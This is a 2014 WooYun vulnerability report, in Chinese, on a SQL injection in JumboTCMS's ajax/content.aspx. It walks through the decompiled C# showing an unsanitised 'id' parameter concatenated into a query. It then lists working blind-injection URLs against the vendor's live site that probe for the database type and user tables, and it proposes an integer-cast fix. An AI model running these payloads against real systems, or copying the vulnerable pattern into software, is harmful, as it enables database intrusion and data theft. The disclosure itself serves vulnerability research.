乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-06: 细节已通知厂商并且等待厂商处理中 2014-06-06: 厂商已经确认,细节仅向厂商公开 2014-06-09: 细节向第三方安全合作伙伴开放 2014-07-31: 细节向核心白帽子及相关领域专家公开 2014-08-10: 细节向普通白帽子公开 2014-08-20: 细节向实习白帽子公开 2014-09-04: 细节向公众公开
JumboTCMS最新版存在注入一枚 官网测试成功
漏洞页面
http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22&oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3
源代码如下
protected void Page_Load(object sender, EventArgs e){ base.Server.ScriptTimeout = 8; this._operType = base.q("oper"); string CS$4$0000 = this._operType; if (CS$4$0000 != null) { if (!(CS$4$0000 == "ajaxDownCount")) { if (CS$4$0000 == "ajaxAddFavorite") { this.ajaxAddFavorite(); goto Label_0059; } } else { this.ajaxDownCount(); //跟进 goto Label_0059; } } this.DefaultResponse();Label_0059: base.Response.Write(this._response);}
private void ajaxDownCount(){ string _type = base.q("cType"); //cType为固定几个值 我们选soft if (!base.ModuleIsOK(_type)) { base.Response.Write("请勿恶意攻击"); base.Response.End(); } if (base.Str2Int(base.q("addit")) == 1) { base.doh.Reset(); base.doh.ConditionExpress = "id=" + base.q("id"); base.doh.Add("jcms_module_" + _type, "DownNum"); } base.doh.Reset(); base.doh.ConditionExpress = "id=" + base.q("id");//看这里 this._response = "{\"count\" :\"" + base.Str2Int(base.doh.GetField("jcms_module_" + _type, "DownNum").ToString()) + "\"}"; //跟进GetField 函数}
public object GetField(string _tableName, string _fieldName, bool _isField){ this.tableName = _tableName; this.fieldName = _fieldName; if (_isField) { this.SqlCmd = "select [" + this.fieldName + "] from [" + this.tableName + "]"; } else { this.SqlCmd = "select " + this.fieldName + " from [" + this.tableName + "]"; } if (this.ConditionExpress != string.Empty) { this.SqlCmd = this.SqlCmd + " where " + this.ConditionExpress; //this.ConditionExpress 就是上面的 "id=" + base.q("id"); 接着看下q()函数吧 } this.cmd.CommandText = this.SqlCmd; this.GenParameters(); object ret = this.cmd.ExecuteScalar(); if (ret == null) { ret = string.Empty; } return ret;}
public string q(string s){ if ((HttpContext.Current.Request.QueryString[s] != null) && (HttpContext.Current.Request.QueryString[s] != "")) { return Strings.SafetyQueryS(HttpContext.Current.Request.QueryString[s].ToString());//跟进 } return string.Empty;}public static string SafetyQueryS(string theString){ string[] aryReg = new string[] { "'", ";", "\"", "\r", "\n", "<", ">" }; for (int i = 0; i < aryReg.Length; i++) { theString = theString.Replace(aryReg[i], string.Empty); } return theString;}//过滤了' < > 所以上面是存在注入的 可以构造
故id存在注入
访问
正常显示
http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22 and 1=1 &oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3
http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22 and 1=2 &oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3
不一样的显示
mssql数据库
http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22 and exists (select * from sysobjects) &oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3
存在jcms_normal_user表
http://www.jumbotcms.net/ajax/content.aspx?cType=soft&id=22 and exists (select * from jcms_normal_user) &oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF3
由于过滤了< > 所以范围被限制了 只能用=号一个一个判断 有点麻烦 不过确实是存在注入
对q函数进行完善对带入的参数id进行int转换
危害等级:高
漏洞Rank:18
确认时间:2014-06-06 23:47
纯属遗漏,低级失误
暂无
